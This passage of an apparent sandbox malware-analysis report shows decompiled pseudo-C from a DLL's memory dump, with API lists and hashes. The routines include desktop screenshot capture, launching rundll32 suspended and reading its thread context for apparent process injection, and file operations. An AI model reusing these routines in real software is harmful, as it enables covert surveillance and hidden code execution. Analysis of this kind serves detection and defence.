											_t98 = _t98 + 0x10;
										}
										if( *((intOrPtr*)(_t98 + 0x14)) == 0) {
											 *_t94 = (_t74 & 0xffffff00 | _t92 != 0x00000000) + 0x30;
											_t94[1] = 0;
											_t86 = M6F3404CC; // 0x99d818
											_t57 = M6F3404D8; // 0x99b240
											_t78 = M6F3404DC; // 0x99b1c8
											WritePrivateProfileStringA(_t78, _t57, _t94, _t86);
											 *((intOrPtr*)(_t98 + 0x18)) = 1;
										}
									}
									_push(0x1e);
									_push(_t98 + 0x24);
									 *((short*)( *((intOrPtr*)(_t98 + 0x1c)) + _t67 - 1)) = 0;
									L6F33C2EE();
									 *((intOrPtr*)(_t98 + 0x28)) = 3;
									 *(_t98 + 0x2c) = _t67;
									 *((short*)(_t98 + 0x34)) = 0x614;
									SHFileOperationA(_t98 + 0x20);
								}
								HeapFree(GetProcessHeap(), 0, _t96);
							}
							goto L23;
						} else {
							return _t36;
						}
					}
				}
			}



































                                                                                                                        0x6f3344d0
                                                                                                                        0x6f3344d0
                                                                                                                        0x6f3344db
                                                                                                                        0x6f3344e3
                                                                                                                        0x6f334749
                                                                                                                        0x6f334751
                                                                                                                        0x6f3344e9
                                                                                                                        0x6f3344e9
                                                                                                                        0x6f3344ee
                                                                                                                        0x6f3344f4
                                                                                                                        0x6f3344ff
                                                                                                                        0x6f334505
                                                                                                                        0x6f33450b
                                                                                                                        0x6f334521
                                                                                                                        0x00000000
                                                                                                                        0x6f334523
                                                                                                                        0x6f334523
                                                                                                                        0x6f33452f
                                                                                                                        0x6f334536
                                                                                                                        0x6f334540
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f334540
                                                                                                                        0x00000000
                                                                                                                        0x6f334511
                                                                                                                        0x6f334515
                                                                                                                        0x6f334546
                                                                                                                        0x6f33455b
                                                                                                                        0x6f33455f
                                                                                                                        0x6f334565
                                                                                                                        0x6f33456b
                                                                                                                        0x6f33456c
                                                                                                                        0x6f334584
                                                                                                                        0x6f334586
                                                                                                                        0x6f334593
                                                                                                                        0x6f334593
                                                                                                                        0x6f3345a5
                                                                                                                        0x6f3345a9
                                                                                                                        0x6f3345ae
                                                                                                                        0x6f3345b3
                                                                                                                        0x6f3345b9
                                                                                                                        0x6f3345c1
                                                                                                                        0x6f3345d3
                                                                                                                        0x6f3345e0
                                                                                                                        0x6f3345e0
                                                                                                                        0x6f3345ec
                                                                                                                        0x6f3345ee
                                                                                                                        0x6f3345f6
                                                                                                                        0x6f3345fa
                                                                                                                        0x6f3345fe
                                                                                                                        0x6f334620
                                                                                                                        0x6f334632
                                                                                                                        0x6f334634
                                                                                                                        0x6f334600
                                                                                                                        0x6f334600
                                                                                                                        0x6f334619
                                                                                                                        0x6f33461b
                                                                                                                        0x6f33461b
                                                                                                                        0x6f334637
                                                                                                                        0x6f33463f
                                                                                                                        0x6f334640
                                                                                                                        0x6f334642
                                                                                                                        0x6f334648
                                                                                                                        0x6f334650
                                                                                                                        0x6f334655
                                                                                                                        0x6f33465a
                                                                                                                        0x6f334667
                                                                                                                        0x6f334669
                                                                                                                        0x6f33467f
                                                                                                                        0x6f334681
                                                                                                                        0x6f334685
                                                                                                                        0x6f334687
                                                                                                                        0x6f334689
                                                                                                                        0x6f33468f
                                                                                                                        0x6f334694
                                                                                                                        0x6f334694
                                                                                                                        0x6f334697
                                                                                                                        0x6f33469d
                                                                                                                        0x6f3346b6
                                                                                                                        0x6f3346be
                                                                                                                        0x6f3346c3
                                                                                                                        0x6f33469f
                                                                                                                        0x6f33469f
                                                                                                                        0x6f3346ac
                                                                                                                        0x6f3346b1
                                                                                                                        0x6f3346b1
                                                                                                                        0x6f3346cb
                                                                                                                        0x6f3346d5
                                                                                                                        0x6f3346d7
                                                                                                                        0x6f3346db
                                                                                                                        0x6f3346e1
                                                                                                                        0x6f3346e6
                                                                                                                        0x6f3346f0
                                                                                                                        0x6f3346f6
                                                                                                                        0x6f3346f6
                                                                                                                        0x6f3346cb
                                                                                                                        0x6f334702
                                                                                                                        0x6f334708
                                                                                                                        0x6f334709
                                                                                                                        0x6f334710
                                                                                                                        0x6f33471f
                                                                                                                        0x6f334727
                                                                                                                        0x6f33472b
                                                                                                                        0x6f334730
                                                                                                                        0x6f334730
                                                                                                                        0x6f334740
                                                                                                                        0x6f334747
                                                                                                                        0x00000000
                                                                                                                        0x6f33451b
                                                                                                                        0x6f33451b
                                                                                                                        0x6f33451b
                                                                                                                        0x6f334515
                                                                                                                        0x6f33450b

                                                                                                                        APIs
                                                                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 6F3344FF
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000800), ref: 6F33454E
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F334555
                                                                                                                        • wsprintfA.USER32 ref: 6F334584
                                                                                                                        • wsprintfA.USER32 ref: 6F33459F
                                                                                                                        • wsprintfA.USER32 ref: 6F3345D3
                                                                                                                        • wsprintfA.USER32 ref: 6F3345EC
                                                                                                                        • wsprintfA.USER32 ref: 6F334619
                                                                                                                        • wsprintfA.USER32 ref: 6F334632
                                                                                                                        • wsprintfA.USER32 ref: 6F33467F
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(0099B1C8,0099B240,00000602,0099D818), ref: 6F3346F0
                                                                                                                        • RtlZeroMemory.NTDLL(?,0000001E), ref: 6F334710
                                                                                                                        • SHFileOperationA.SHELL32 ref: 6F334730
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F334739
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F334740
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$Heap$PrivateProcessProfile$AllocFileFreeMemoryOperationStringWriteZero
                                                                                                                        • String ID: %s "%s%s%s" %s$%s %s$%s%d%c$%s%s%c$%s%s%s$.cab$.exe$.inf$install$remove$restart$vpn
                                                                                                                        • API String ID: 39017707-2794406546
                                                                                                                        • Opcode ID: dc06a852ccbb669c2993b5080dc57bbda6e780d6b013546a88d4809a91ee2205
                                                                                                                        • Instruction ID: 0449499d11f6e2f4abee47aa19376abbf9115b9fda9b6db3c8cecfca3460325a
                                                                                                                        • Opcode Fuzzy Hash: dc06a852ccbb669c2993b5080dc57bbda6e780d6b013546a88d4809a91ee2205
                                                                                                                        • Instruction Fuzzy Hash: CD61C5B2E043A8BBE710EF64CC45F6B77ADAF85714F01450CF954AB280EA76F4148B65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3323B0, Relevance: 47.4, APIs: 21, Strings: 6, Instructions: 164librarythreadstringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 96%
                                                                                                                        			E6F3323B0() {
				char _v260;
				char _v268;
				char* _v272;
				struct _SECURITY_ATTRIBUTES* _v276;
				struct _SECURITY_ATTRIBUTES* _v280;
				struct _SECURITY_ATTRIBUTES* _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				void* _v296;
				char _v320;
				struct HINSTANCE__* _v324;
				void _v328;
				struct HINSTANCE__* _v332;
				char _v336;
				long _v340;
				char _v344;
				CHAR* _t42;
				int _t50;
				long _t51;
				char* _t53;
				char* _t54;
				void* _t56;
				intOrPtr _t62;
				void* _t65;
				void* _t73;
				void* _t88;
				signed int _t91;
				void* _t92;
				long _t96;
				void* _t97;

				_v328 = LoadLibraryA("msvcrt.dll");
				_v324 = LoadLibraryA("user32.dll");
				_v332 = LoadLibraryA("shlwapi.dll");
				_t42 = GetCommandLineA();
				_v340 = 0;
				_t88 = E6F33A3D0(_t42,  &_v340);
				if(_t88 == 0) {
					L24:
					FreeLibrary(_v324);
					FreeLibrary(_v332);
					FreeLibrary(_v328);
					ExitProcess(0);
				}
				if(_v340 <= 1) {
					L23:
					LocalFree(_t88);
					goto L24;
				} else {
					_t91 = 1;
					do {
						_t50 = lstrcmpiA( *(_t88 + _t91 * 4), "-svcr");
						_t51 = _v340;
						if(_t50 != 0) {
							goto L5;
						}
						_t91 = _t91 + 1;
						if(_t91 < _t51) {
							_t53 = StrRChrA( *(_t88 + _t91 * 4), 0, 0x5c);
							if(_t53 == 0) {
								break;
							}
							_t54 =  &(_t53[1]);
							if(_t54 != 0 &&  *_t54 != 0) {
								wsprintfA( &_v268, "%s%s", "pdll", _t54);
								_t56 = OpenEventA(2, 0,  &_v260);
								if(_t56 != 0) {
									CloseHandle(_t56);
									break;
								}
								_t73 = CreateEventA(0, 1, 0,  &_v260);
								_t96 = 0;
								if(_t73 != 0) {
									_push(0x3c);
									_push( &_v320);
									L6F33C2EE();
									_v344 = 0;
									_t62 = E6F332260( *(_t88 + _t91 * 4),  &_v344);
									if(_t62 != 0) {
										_v292 = _t62;
										_v288 = _v344;
										_v284 = 0;
										_v280 = 0;
										_v276 = 0;
										_v272 =  *(_t88 + _t91 * 4);
										_t92 = CreateThread(0, 0, E6F332340,  &_v328, 0, 0);
										if(_t92 != 0) {
											_t97 = E6F331D00(_v296, _v292, 0,  &_v332);
											if(_v296 != 0) {
												NtTerminateThread(_t92, 0);
												if(_t97 == 0) {
													E6F331C00( &_v336);
												}
											}
											CloseHandle(_t92);
											_t96 = 0;
										}
										_t65 = _v296;
										if(_t65 != _t96) {
											VirtualFree(_t65, _t96, 0x8000);
										}
									}
								}
								CloseHandle(_t73);
							}
							break;
						}
						L5:
						_t91 = _t91 + 1;
					} while (_t91 < _t51);
					goto L23;
				}
			}

































                                                                                                                        0x6f3323ca
                                                                                                                        0x6f3323d5
                                                                                                                        0x6f3323db
                                                                                                                        0x6f3323df
                                                                                                                        0x6f3323eb
                                                                                                                        0x6f3323f8
                                                                                                                        0x6f3323ff
                                                                                                                        0x6f332589
                                                                                                                        0x6f332594
                                                                                                                        0x6f33259b
                                                                                                                        0x6f3325a2
                                                                                                                        0x6f3325a6
                                                                                                                        0x6f3325a6
                                                                                                                        0x6f33240c
                                                                                                                        0x6f332582
                                                                                                                        0x6f332583
                                                                                                                        0x00000000
                                                                                                                        0x6f332412
                                                                                                                        0x6f332419
                                                                                                                        0x6f332420
                                                                                                                        0x6f332429
                                                                                                                        0x6f33242d
                                                                                                                        0x6f332431
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f332433
                                                                                                                        0x6f332436
                                                                                                                        0x6f33244a
                                                                                                                        0x6f332452
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f332458
                                                                                                                        0x6f332459
                                                                                                                        0x6f332478
                                                                                                                        0x6f33248a
                                                                                                                        0x6f332492
                                                                                                                        0x6f33257b
                                                                                                                        0x00000000
                                                                                                                        0x6f33257b
                                                                                                                        0x6f3324aa
                                                                                                                        0x6f3324ac
                                                                                                                        0x6f3324b0
                                                                                                                        0x6f3324b6
                                                                                                                        0x6f3324bc
                                                                                                                        0x6f3324bd
                                                                                                                        0x6f3324cb
                                                                                                                        0x6f3324cf
                                                                                                                        0x6f3324d9
                                                                                                                        0x6f3324e8
                                                                                                                        0x6f3324f8
                                                                                                                        0x6f3324fc
                                                                                                                        0x6f332500
                                                                                                                        0x6f332504
                                                                                                                        0x6f332508
                                                                                                                        0x6f332512
                                                                                                                        0x6f332516
                                                                                                                        0x6f332535
                                                                                                                        0x6f332537
                                                                                                                        0x6f33253c
                                                                                                                        0x6f332543
                                                                                                                        0x6f33254a
                                                                                                                        0x6f33254f
                                                                                                                        0x6f332543
                                                                                                                        0x6f332553
                                                                                                                        0x6f332559
                                                                                                                        0x6f332559
                                                                                                                        0x6f33255b
                                                                                                                        0x6f332561
                                                                                                                        0x6f33256a
                                                                                                                        0x6f33256a
                                                                                                                        0x6f332561
                                                                                                                        0x6f3324d9
                                                                                                                        0x6f332571
                                                                                                                        0x6f332577
                                                                                                                        0x00000000
                                                                                                                        0x6f332459
                                                                                                                        0x6f332438
                                                                                                                        0x6f332438
                                                                                                                        0x6f332439
                                                                                                                        0x00000000
                                                                                                                        0x6f332581

                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(msvcrt.dll), ref: 6F3323C3
                                                                                                                        • LoadLibraryA.KERNEL32(user32.dll), ref: 6F3323CE
                                                                                                                        • LoadLibraryA.KERNEL32(shlwapi.dll), ref: 6F3323D9
                                                                                                                        • GetCommandLineA.KERNEL32 ref: 6F3323DF
                                                                                                                          • Part of subcall function 6F33A3D0: lstrlenA.KERNEL32(?,?,?,?,00000000,?), ref: 6F33A3DB
                                                                                                                          • Part of subcall function 6F33A3D0: LocalAlloc.KERNEL32(00000040,00000004,?,?,?,00000000,?), ref: 6F33A3F4
                                                                                                                        • lstrcmpiA.KERNEL32(?,-svcr), ref: 6F332429
                                                                                                                        • StrRChrA.SHLWAPI(?,00000000,0000005C,?,-svcr), ref: 6F33244A
                                                                                                                        • wsprintfA.USER32 ref: 6F332478
                                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,?), ref: 6F33248A
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 6F3324A4
                                                                                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 6F3324BD
                                                                                                                        • CreateThread.KERNEL32 ref: 6F33250C
                                                                                                                        • NtTerminateThread.NTDLL ref: 6F33253C
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F332553
                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 6F33256A
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F332571
                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 6F332583
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 6F332594
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 6F33259B
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 6F3325A2
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F3325A6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$Free$Load$CloseCreateEventHandleLocalThread$AllocCommandExitLineMemoryOpenProcessTerminateVirtualZerolstrcmpilstrlenwsprintf
                                                                                                                        • String ID: %s%s$-svcr$msvcrt.dll$pdll$shlwapi.dll$user32.dll
                                                                                                                        • API String ID: 4122922002-3260842094
                                                                                                                        • Opcode ID: ba3dd78bd3816c3261faafbb08f3ce6c4237d4eea5135c99e6d5a31c64f96b60
                                                                                                                        • Instruction ID: 3b1e1d5bb70e5227133ba15b556a6e46b90200c1490a516523f2600940f2b47e
                                                                                                                        • Opcode Fuzzy Hash: ba3dd78bd3816c3261faafbb08f3ce6c4237d4eea5135c99e6d5a31c64f96b60
                                                                                                                        • Instruction Fuzzy Hash: E951CF73D047A9ABE710DFA8CD44F5BBBEDAB85714F00490DF95192240DB71E9108BA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3366E0, Relevance: 34.7, APIs: 23, Instructions: 239windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 59%
                                                                                                                        			E6F3366E0() {
				intOrPtr* _v140;
				void** _v144;
				struct tagRECT _v164;
				long _v168;
				struct HDC__* _v172;
				int _v180;
				int _v184;
				void _v188;
				int _v192;
				int _v196;
				struct tagCURSORINFO _v212;
				struct HDC__* _v216;
				intOrPtr _v224;
				intOrPtr _v228;
				struct HICON__* _v232;
				intOrPtr _v252;
				intOrPtr _v256;
				void* _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				struct HDC__* _v288;
				struct HDC__* _v304;
				long _v308;
				intOrPtr _v316;
				struct HDC__* _v320;
				intOrPtr _v324;
				struct HDC__* _t61;
				struct HDC__* _t62;
				int _t67;
				void* _t70;
				int _t75;
				intOrPtr _t91;
				int _t99;
				long _t101;
				int _t103;
				struct HWND__* _t136;
				void* _t137;
				int _t138;
				struct HDC__* _t139;
				intOrPtr _t140;
				int _t142;
				void* _t144;

				_v168 = 0;
				_t136 = GetDesktopWindow();
				_v164.left = _t136;
				_t61 = GetDC(_t136);
				_t139 = _t61;
				_v172 = _t139;
				if(_t139 != 0) {
					_t62 = CreateCompatibleDC(_t139);
					_v188 = _t62;
					if(_t62 != 0) {
						_push(0x10);
						_push( &(_v164.right));
						L6F33C2EE();
						GetWindowRect(_t136,  &_v164);
						_t103 = _v164.bottom;
						_t67 = _v164.right;
						_t99 = _t67;
						_t142 = _t103;
						_t137 = CreateCompatibleBitmap(_t139, _t67, _t103);
						_v212.hCursor = _t137;
						if(_t137 != 0) {
							_t70 = SelectObject(_v212.flags, _t137);
							if(_t70 != 0 && _t70 != 0xffffffff && BitBlt(_v216, _v184, _v180, _t99, _t142, _t139, 0, 0, 0x40cc0020) != 0) {
								_push(0x14);
								_push( &(_v212.hCursor));
								L6F33C2EE();
								_v212.cbSize = 0x14;
								_t75 = GetCursorInfo( &_v212);
								if(_t75 != 0 && _v212.flags == 1) {
									_push(0x14);
									_push( &_v192);
									L6F33C2EE();
									_t75 = GetIconInfo(_v212.cbSize,  &(_v212.ptScreenPos));
									if(_t75 != 0) {
										_push(0x18);
										_push( &_v180);
										L6F33C2EE();
										GetObjectA(_v192, 0x18,  &_v188);
										_t75 = DrawIconEx(_v288, _v228 - _v256 + _v256 - _v216, _v224 - _v252 + _v252 - _v212, _v232, _v196, _v192, 0, 0, 3);
									}
								}
								__imp__#12(0, 0);
								_t138 = _t75;
								if(_t138 != 0) {
									_push(_t138);
									_push(_t142);
									_push(_t99);
									_push( &_v264);
									if(E6F336480() != 0) {
										_push(0x48);
										_push( &(_v164.right));
										L6F33C2EE();
										_push(1);
										_push( &_v164);
										_push(_t138);
										if( *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0x30))))() >= 0) {
											_t101 = _v168;
											if(_t101 != 0) {
												_t144 = VirtualAlloc(0, _t101, 0x1000, 4);
												if(_t144 != 0) {
													_push(8);
													_push( &_v264);
													L6F33C2EE();
													_push(0);
													asm("xorpd xmm0, xmm0");
													asm("movlpd [esp+0x2c], xmm0");
													_push(0);
													_push(_v268);
													_push(_v272);
													_push(_t138);
													if( *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0x14))))() < 0) {
														L24:
														VirtualFree(_t144, 0, 0x8000);
													} else {
														_t140 = 0;
														if(_t101 == 0) {
															L23:
															_t139 = _v304;
															goto L24;
														} else {
															while(1) {
																_push( &_v308);
																_push(_t101 - _t140);
																_push(_t140 + _t144);
																_push(_t138);
																_v308 = 0;
																if( *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0xc))))() < 0) {
																	break;
																}
																_t91 = _v324;
																if(_t91 != 0) {
																	_t140 = _t140 + _t91;
																	if(_t140 < _t101) {
																		continue;
																	}
																}
																break;
															}
															if(_t140 == 0) {
																goto L23;
															} else {
																 *_v140 = _t140;
																_t139 = _v320;
																 *_v144 = _t144;
																_v316 = 1;
															}
														}
													}
												}
											}
										}
									}
									 *((intOrPtr*)( *((intOrPtr*)( *_t138 + 8))))(_t138);
								}
								_t137 = _v264;
							}
							DeleteObject(_t137);
						}
						DeleteDC(_v212.flags);
						_t136 = _v192;
					}
					ReleaseDC(_t136, _t139);
					return _v172;
				} else {
					return _t61;
				}
			}













































                                                                                                                        0x6f3366e8
                                                                                                                        0x6f3366f6
                                                                                                                        0x6f3366f9
                                                                                                                        0x6f3366fd
                                                                                                                        0x6f336703
                                                                                                                        0x6f336705
                                                                                                                        0x6f33670b
                                                                                                                        0x6f336717
                                                                                                                        0x6f33671d
                                                                                                                        0x6f336723
                                                                                                                        0x6f33672b
                                                                                                                        0x6f336731
                                                                                                                        0x6f336732
                                                                                                                        0x6f33673d
                                                                                                                        0x6f336743
                                                                                                                        0x6f336747
                                                                                                                        0x6f33674e
                                                                                                                        0x6f336750
                                                                                                                        0x6f336758
                                                                                                                        0x6f33675a
                                                                                                                        0x6f336760
                                                                                                                        0x6f33676c
                                                                                                                        0x6f336774
                                                                                                                        0x6f3367ac
                                                                                                                        0x6f3367b2
                                                                                                                        0x6f3367b3
                                                                                                                        0x6f3367bd
                                                                                                                        0x6f3367c5
                                                                                                                        0x6f3367cd
                                                                                                                        0x6f3367de
                                                                                                                        0x6f3367e4
                                                                                                                        0x6f3367e5
                                                                                                                        0x6f3367f4
                                                                                                                        0x6f3367fc
                                                                                                                        0x6f3367fe
                                                                                                                        0x6f336804
                                                                                                                        0x6f336805
                                                                                                                        0x6f336816
                                                                                                                        0x6f33685a
                                                                                                                        0x6f33685a
                                                                                                                        0x6f3367fc
                                                                                                                        0x6f336864
                                                                                                                        0x6f33686a
                                                                                                                        0x6f33686e
                                                                                                                        0x6f336874
                                                                                                                        0x6f336875
                                                                                                                        0x6f33687a
                                                                                                                        0x6f33687b
                                                                                                                        0x6f336886
                                                                                                                        0x6f33688c
                                                                                                                        0x6f336895
                                                                                                                        0x6f336896
                                                                                                                        0x6f3368a0
                                                                                                                        0x6f3368a9
                                                                                                                        0x6f3368aa
                                                                                                                        0x6f3368af
                                                                                                                        0x6f3368b5
                                                                                                                        0x6f3368be
                                                                                                                        0x6f3368d4
                                                                                                                        0x6f3368d8
                                                                                                                        0x6f3368de
                                                                                                                        0x6f3368e4
                                                                                                                        0x6f3368e5
                                                                                                                        0x6f3368ef
                                                                                                                        0x6f3368f1
                                                                                                                        0x6f3368f5
                                                                                                                        0x6f336903
                                                                                                                        0x6f336905
                                                                                                                        0x6f336906
                                                                                                                        0x6f336907
                                                                                                                        0x6f33690c
                                                                                                                        0x6f33696c
                                                                                                                        0x6f336974
                                                                                                                        0x6f33690e
                                                                                                                        0x6f33690e
                                                                                                                        0x6f336912
                                                                                                                        0x6f336968
                                                                                                                        0x6f336968
                                                                                                                        0x00000000
                                                                                                                        0x6f336914
                                                                                                                        0x6f336914
                                                                                                                        0x6f33691a
                                                                                                                        0x6f33691f
                                                                                                                        0x6f336926
                                                                                                                        0x6f336927
                                                                                                                        0x6f336928
                                                                                                                        0x6f336934
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f336936
                                                                                                                        0x6f33693c
                                                                                                                        0x6f33693e
                                                                                                                        0x6f336942
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f336942
                                                                                                                        0x00000000
                                                                                                                        0x6f33693c
                                                                                                                        0x6f336946
                                                                                                                        0x00000000
                                                                                                                        0x6f336948
                                                                                                                        0x6f336956
                                                                                                                        0x6f336958
                                                                                                                        0x6f33695c
                                                                                                                        0x6f33695e
                                                                                                                        0x6f33695e
                                                                                                                        0x6f336946
                                                                                                                        0x6f336912
                                                                                                                        0x6f33690c
                                                                                                                        0x6f3368d8
                                                                                                                        0x6f3368be
                                                                                                                        0x6f3368af
                                                                                                                        0x6f336980
                                                                                                                        0x6f336980
                                                                                                                        0x6f336982
                                                                                                                        0x6f336982
                                                                                                                        0x6f336987
                                                                                                                        0x6f336987
                                                                                                                        0x6f336992
                                                                                                                        0x6f336998
                                                                                                                        0x6f33699d
                                                                                                                        0x6f3369a0
                                                                                                                        0x6f3369b2
                                                                                                                        0x6f336715
                                                                                                                        0x6f336715
                                                                                                                        0x6f336715

                                                                                                                        APIs
                                                                                                                        • GetDesktopWindow.USER32 ref: 6F3366F0
                                                                                                                        • GetDC.USER32(00000000), ref: 6F3366FD
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 6F336717
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000010), ref: 6F336732
                                                                                                                        • GetWindowRect.USER32 ref: 6F33673D
                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 6F336752
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 6F33676C
                                                                                                                        • BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,40CC0020), ref: 6F33679E
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000014), ref: 6F3367B3
                                                                                                                        • GetCursorInfo.USER32(?,?,?,?,?,?,?,?,?,?,00000014), ref: 6F3367C5
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000014), ref: 6F3367E5
                                                                                                                        • GetIconInfo.USER32(?,?), ref: 6F3367F4
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000018), ref: 6F336805
                                                                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 6F336816
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryZero$CompatibleCreateInfoObjectWindow$BitmapCursorDesktopIconRectSelect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3821519111-0
                                                                                                                        • Opcode ID: f2972d9751e82e47922c31759095ead73aaa2a843e33c28de46479fdfd7f13d2
                                                                                                                        • Instruction ID: 5edd4008e85c71a6e05d28f4fc7243db9f12e416d3f7eefce464569818c76a71
                                                                                                                        • Opcode Fuzzy Hash: f2972d9751e82e47922c31759095ead73aaa2a843e33c28de46479fdfd7f13d2
                                                                                                                        • Instruction Fuzzy Hash: CE818A72604395AFD720DF64C884F6BB7E9AB8AB54F00490DFA8497284DB71E805CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F332750, Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 115memorynativethreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 74%
                                                                                                                        			E6F332750(CHAR* _a4) {
				intOrPtr _v552;
				struct _CONTEXT _v724;
				struct _STARTUPINFOA _v792;
				struct _PROCESS_INFORMATION _v808;
				void* _v812;
				void* _v816;
				char _t23;
				long* _t38;
				CHAR* _t51;
				void* _t52;
				void* _t55;

				_t51 = _a4;
				_t38 = 0;
				if(GetFileAttributesA(_t51) == 0xffffffff) {
					return 0;
				} else {
					_t55 = HeapAlloc(GetProcessHeap(), 8, 0x30c);
					if(_t55 != 0) {
						_t23 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x996628
						wsprintfA(_t55, "\"%s%s\" %s \"%s\"", _t23, "rundll32.exe", "-svcr", _t51);
						_push(0x44);
						_push( &(_v792.dwX));
						L6F33C2EE();
						_push(0x10);
						_push( &(_v808.dwProcessId));
						_v792.lpDesktop = 0x44;
						L6F33C2EE();
						if(CreateProcessA(0, _t55, 0, 0, 0, 4, 0, 0,  &_v792,  &_v808) != 0) {
							_push(_v808.hProcess);
							_t52 = E6F332640();
							if(_t52 == 0) {
								L8:
								_push(0);
								_push(_v808.hProcess);
								L6F33C30C();
							} else {
								_v724 = 0x10002;
								if(NtGetContextThread(_v808.hThread,  &_v724) < 0) {
									goto L8;
								} else {
